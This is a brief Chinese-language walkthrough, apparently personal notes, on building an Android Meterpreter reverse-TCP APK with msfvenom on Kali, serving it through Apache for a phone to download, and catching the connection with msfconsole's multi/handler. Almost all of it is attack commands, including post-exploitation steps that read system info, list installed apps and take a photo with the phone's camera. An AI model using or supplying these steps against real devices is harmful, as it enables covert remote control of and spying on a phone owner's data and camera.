ip add   //查看kali 的ip地址  虚拟机桥接模式

msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的ip地址 LPORT=4444 R > t.apk

生成apk下载到手机

可以利用kali Apache2 在局域网内直接下载apk或其他办法

sudo cp t.apk /var/www/html   //拷贝到此目录可网页访问

vi /var/www/html/index.html   // 第一次应修改html 网页内容  ,加入下载链接

 

手机端下载后

电脑端运行，发现鸿蒙系统直接安不上，可能需要进一步操作。

msfconsole 

use multi/handler  //使用一个模块在kali设置一个监听的程序

 set payload android/meterpreter/reverse_tcp//设置荷载  安卓机 

set LHOST kaliIP

exploit

手机运行起来，就建立了链接。就可进一步进行操作。

我这个中间出现了连接拒绝提示，但是还是可以断断续续进行操作的，可能是趁手机不注意就成功了。。应该是现在手机的安全做的比较好，

sysinfo //查看手机信息
 

 

 app_list //查看手机app信息

 

 

 webcam_snap  //拍照
 

 

保存到此目录

成功拍照。

：我的手机拍照过程有声音，

好歹顺下来了

写的很粗糙，仅供参考吧。